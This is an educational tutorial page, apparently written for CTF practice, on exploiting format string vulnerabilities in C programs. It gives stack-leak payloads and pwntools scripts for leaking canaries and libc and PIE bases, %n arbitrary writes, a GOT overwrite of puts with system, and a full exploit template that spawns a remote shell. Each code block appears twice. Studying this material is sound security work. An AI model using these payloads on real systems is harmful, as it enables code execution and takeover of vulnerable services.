Memory Corruption

⚡ Intermediate

Format String Vulnerabilities

Format string vulnerabilities occur when user input is passed directly to functions like printf() without proper formatting. These bugs enable reading/writing arbitrary memory locations.

Impact

Format string bugs can lead to: information disclosure (stack/heap leaks), arbitrary memory writes, stack canary bypass, and ultimately remote code execution.

The Vulnerability

❌ Vulnerable Code

char buf[100];
fgets(buf, 100, stdin);
printf(buf);  // User controls format string!
char buf[100];
fgets(buf, 100, stdin);
printf(buf);  // User controls format string!

✓ Safe Code

char buf[100];
fgets(buf, 100, stdin);
printf("%s", buf);  // Format string is fixed
char buf[100];
fgets(buf, 100, stdin);
printf("%s", buf);  // Format string is fixed

Useful Format Specifiers

Specifier	Description	Exploit Use
%x	Print hex (32-bit)	Leak stack values
%lx	Print hex (64-bit)	Leak stack values (x64)
%p	Print pointer	Leak addresses
%s	Print string at address	Read arbitrary memory
%n	Write bytes printed	Arbitrary write!
%hn	Write 2 bytes	Partial overwrite
%N$x	Direct parameter access	Read specific stack position

Reading the Stack

Basic Stack Leak

bash

# Input multiple %x to dump stack values
%x.%x.%x.%x.%x.%x.%x.%x

# Output shows stack contents:
# 0.64.f7fc4580.0.f7fc4580.ffffffff.deadbeef.41414141

# Using %p for cleaner pointer output (with 0x prefix)
%p.%p.%p.%p.%p.%p.%p.%p
# Input multiple %x to dump stack values
%x.%x.%x.%x.%x.%x.%x.%x

# Output shows stack contents:
# 0.64.f7fc4580.0.f7fc4580.ffffffff.deadbeef.41414141

# Using %p for cleaner pointer output (with 0x prefix)
%p.%p.%p.%p.%p.%p.%p.%p

Direct Parameter Access

Use %N$x to directly access the Nth argument on the stack:

bash

# Read 6th value on stack (often where our input lands)
%6$x

# Read 10th value as pointer
%10$p

# Find where your input lands on the stack
AAAA%6$x%7$x%8$x%9$x%10$x
# Look for 41414141 (hex for AAAA)
# Read 6th value on stack (often where our input lands)
%6$x

# Read 10th value as pointer
%10$p

# Find where your input lands on the stack
AAAA%6$x%7$x%8$x%9$x%10$x
# Look for 41414141 (hex for AAAA)

Finding Your Input Offset

python

from pwn import *

# Automated offset finder
def find_offset(p, max_offset=50):
    for i in range(1, max_offset):
        p.sendline(f'AAAA%{i}$x')
        output = p.recvline()
        if b'41414141' in output:
            print(f'[+] Input found at offset {i}')
            return i
    return None
from pwn import *

# Automated offset finder
def find_offset(p, max_offset=50):
    for i in range(1, max_offset):
        p.sendline(f'AAAA%{i}$x')
        output = p.recvline()
        if b'41414141' in output:
            print(f'[+] Input found at offset {i}')
            return i
    return None

Information Leaks

Leaking Stack Canary

python

# Stack canary is usually at a fixed offset from buffer
# Find it by leaking stack values

# Example: Canary at offset 15
%15$p

# In pwntools exploit:
p.sendline('%15$p')
canary = int(p.recv().strip(), 16)
print(f'[+] Leaked canary: {hex(canary)}')
# Stack canary is usually at a fixed offset from buffer
# Find it by leaking stack values

# Example: Canary at offset 15
%15$p

# In pwntools exploit:
p.sendline('%15$p')
canary = int(p.recv().strip(), 16)
print(f'[+] Leaked canary: {hex(canary)}')

Leaking Libc Address

python

# Return addresses on stack often point to libc
# __libc_start_main+X is commonly found

p.sendline('%41$p')  # Offset varies by binary
libc_leak = int(p.recv().strip(), 16)

# Calculate libc base
libc_start_main_offset = 0x21bf7  # Find with: nm -D libc.so.6 | grep __libc_start_main
libc_base = libc_leak - libc_start_main_offset

print(f'[+] Libc base: {hex(libc_base)}')
# Return addresses on stack often point to libc
# __libc_start_main+X is commonly found

p.sendline('%41$p')  # Offset varies by binary
libc_leak = int(p.recv().strip(), 16)

# Calculate libc base
libc_start_main_offset = 0x21bf7  # Find with: nm -D libc.so.6 | grep __libc_start_main
libc_base = libc_leak - libc_start_main_offset

print(f'[+] Libc base: {hex(libc_base)}')

Leaking PIE Base

python

# Find return addresses to main binary
p.sendline('%43$p')  # Adjust offset
pie_leak = int(p.recv().strip(), 16)

# Calculate base
main_offset = 0x1234  # From binary analysis
pie_base = pie_leak - main_offset

print(f'[+] PIE base: {hex(pie_base)}')
# Find return addresses to main binary
p.sendline('%43$p')  # Adjust offset
pie_leak = int(p.recv().strip(), 16)

# Calculate base
main_offset = 0x1234  # From binary analysis
pie_base = pie_leak - main_offset

print(f'[+] PIE base: {hex(pie_base)}')

Arbitrary Write with %n

How %n Works

The %n specifier writes the number of bytes printed so far to the address on the stack. Combined with padding and direct parameter access, this enables writing arbitrary values.

Basic %n Write

python

# Write value 0x64 (100) to address 0x08048000
# Place target address on stack, then use %n

# 32-bit example:
# 1. Put address at offset 7 on stack
# 2. Print 100 bytes
# 3. %7$n writes 100 to address at offset 7

payload = p32(0x08048000)  # Target address
payload += b'%96c'          # Print 96 more chars (100 total with addr)  
payload += b'%7$n'          # Write to offset 7

# Verify: 4 (addr) + 96 = 100 bytes = 0x64 written
# Write value 0x64 (100) to address 0x08048000
# Place target address on stack, then use %n

# 32-bit example:
# 1. Put address at offset 7 on stack
# 2. Print 100 bytes
# 3. %7$n writes 100 to address at offset 7

payload = p32(0x08048000)  # Target address
payload += b'%96c'          # Print 96 more chars (100 total with addr)  
payload += b'%7$n'          # Write to offset 7

# Verify: 4 (addr) + 96 = 100 bytes = 0x64 written

Writing Large Values

Use %hn (2 bytes) or %hhn (1 byte) to write in chunks:

python

from pwn import *

target_addr = 0x0804c000  # GOT entry or return address
target_value = 0xdeadbeef

# Write 2 bytes at a time using %hn
# First write 0xbeef to target_addr
# Then write 0xdead to target_addr+2

low_bytes = target_value & 0xffff         # 0xbeef
high_bytes = (target_value >> 16) & 0xffff  # 0xdead

# Build payload (assuming input at offset 6)
payload = p32(target_addr)      # offset 6
payload += p32(target_addr + 2) # offset 7

# Calculate padding
first_write = low_bytes - 8
second_write = high_bytes - low_bytes

payload += f'%{first_write}c%6$hn'.encode()
payload += f'%{second_write}c%7$hn'.encode()

print(payload)
from pwn import *

target_addr = 0x0804c000  # GOT entry or return address
target_value = 0xdeadbeef

# Write 2 bytes at a time using %hn
# First write 0xbeef to target_addr
# Then write 0xdead to target_addr+2

low_bytes = target_value & 0xffff         # 0xbeef
high_bytes = (target_value >> 16) & 0xffff  # 0xdead

# Build payload (assuming input at offset 6)
payload = p32(target_addr)      # offset 6
payload += p32(target_addr + 2) # offset 7

# Calculate padding
first_write = low_bytes - 8
second_write = high_bytes - low_bytes

payload += f'%{first_write}c%6$hn'.encode()
payload += f'%{second_write}c%7$hn'.encode()

print(payload)

Using pwntools fmtstr_payload

python

from pwn import *

# Automatic format string payload generation
context.arch = 'i386'  # or 'amd64'

# Find offset where input appears on stack
offset = 6

# Create payload to write value to address
payload = fmtstr_payload(offset, {
    0x0804c000: 0xdeadbeef,  # GOT overwrite
    0x0804c004: 0xcafebabe   # Multiple writes
})

# For 64-bit, addresses may contain null bytes
# Use write_size parameter:
payload = fmtstr_payload(offset, {target: value}, write_size='short')
from pwn import *

# Automatic format string payload generation
context.arch = 'i386'  # or 'amd64'

# Find offset where input appears on stack
offset = 6

# Create payload to write value to address
payload = fmtstr_payload(offset, {
    0x0804c000: 0xdeadbeef,  # GOT overwrite
    0x0804c004: 0xcafebabe   # Multiple writes
})

# For 64-bit, addresses may contain null bytes
# Use write_size parameter:
payload = fmtstr_payload(offset, {target: value}, write_size='short')

GOT Overwrite Attack

Overwrite a GOT entry to redirect function calls:

python

from pwn import *

elf = ELF('./vuln')
libc = ELF('./libc.so.6')

# Leak libc address first
p.sendline('%41$p')
libc_leak = int(p.recv().strip(), 16)
libc_base = libc_leak - libc.symbols['__libc_start_main'] - 243

# Calculate system address
system_addr = libc_base + libc.symbols['system']

# Overwrite puts@got with system
puts_got = elf.got['puts']
offset = 6

payload = fmtstr_payload(offset, {puts_got: system_addr})
p.sendline(payload)

# Next call to puts() will call system() instead
p.sendline('/bin/sh')
p.interactive()
from pwn import *

elf = ELF('./vuln')
libc = ELF('./libc.so.6')

# Leak libc address first
p.sendline('%41$p')
libc_leak = int(p.recv().strip(), 16)
libc_base = libc_leak - libc.symbols['__libc_start_main'] - 243

# Calculate system address
system_addr = libc_base + libc.symbols['system']

# Overwrite puts@got with system
puts_got = elf.got['puts']
offset = 6

payload = fmtstr_payload(offset, {puts_got: system_addr})
p.sendline(payload)

# Next call to puts() will call system() instead
p.sendline('/bin/sh')
p.interactive()

Complete Exploit Template

fmt_exploit.py

python

#!/usr/bin/env python3
from pwn import *

context.arch = 'amd64'
context.log_level = 'info'

elf = ELF('./vuln')
libc = ELF('./libc.so.6')

# p = process('./vuln')
p = remote('pwn.ctf.com', 1337)

# Step 1: Find format string offset
# Send AAAAAAAA%p.%p.%p... and find where 0x4141414141414141 appears
FMT_OFFSET = 6

# Step 2: Leak addresses
# Leak libc (adjust offsets based on binary)
p.sendlineafter('> ', '%41$p')
libc_leak = int(p.recvline().strip(), 16)
libc.address = libc_leak - libc.symbols['__libc_start_main'] - 243
log.info(f'Libc base: {hex(libc.address)}')

# Leak stack canary if needed
p.sendlineafter('> ', '%15$p')
canary = int(p.recvline().strip(), 16)
log.info(f'Canary: {hex(canary)}')

# Step 3: Write exploit
# Overwrite return address or GOT entry
target = elf.got['puts']
value = libc.symbols['system']

payload = fmtstr_payload(FMT_OFFSET, {target: value})
p.sendlineafter('> ', payload)

# Step 4: Trigger (call puts with "/bin/sh")
p.sendlineafter('> ', '/bin/sh')
p.interactive()
#!/usr/bin/env python3
from pwn import *

context.arch = 'amd64'
context.log_level = 'info'

elf = ELF('./vuln')
libc = ELF('./libc.so.6')

# p = process('./vuln')
p = remote('pwn.ctf.com', 1337)

# Step 1: Find format string offset
# Send AAAAAAAA%p.%p.%p... and find where 0x4141414141414141 appears
FMT_OFFSET = 6

# Step 2: Leak addresses
# Leak libc (adjust offsets based on binary)
p.sendlineafter('> ', '%41$p')
libc_leak = int(p.recvline().strip(), 16)
libc.address = libc_leak - libc.symbols['__libc_start_main'] - 243
log.info(f'Libc base: {hex(libc.address)}')

# Leak stack canary if needed
p.sendlineafter('> ', '%15$p')
canary = int(p.recvline().strip(), 16)
log.info(f'Canary: {hex(canary)}')

# Step 3: Write exploit
# Overwrite return address or GOT entry
target = elf.got['puts']
value = libc.symbols['system']

payload = fmtstr_payload(FMT_OFFSET, {target: value})
p.sendlineafter('> ', payload)

# Step 4: Trigger (call puts with "/bin/sh")
p.sendlineafter('> ', '/bin/sh')
p.interactive()

Mitigations & Bypasses

FORTIFY_SOURCE

Replaces printf with __printf_chk which limits %n writes. Bypass by targeting writable sections or using %s leaks.

RELRO (Full)

GOT is read-only after startup. Target return addresses on stack, __malloc_hook, or .fini_array instead.

Format String Vulnerabilities

The Vulnerability

❌ Vulnerable Code

✓ Safe Code

Useful Format Specifiers

Reading the Stack

Basic Stack Leak

Direct Parameter Access

Finding Your Input Offset

Information Leaks

Leaking Stack Canary

Leaking Libc Address

Leaking PIE Base

Arbitrary Write with %n

Basic %n Write

Writing Large Values

Using pwntools fmtstr_payload

GOT Overwrite Attack

Complete Exploit Template

Mitigations & Bypasses

FORTIFY_SOURCE

RELRO (Full)

Related Topics

Buffer Overflows

ROP Chains

ASLR Bypass

Binary Exploitation Overview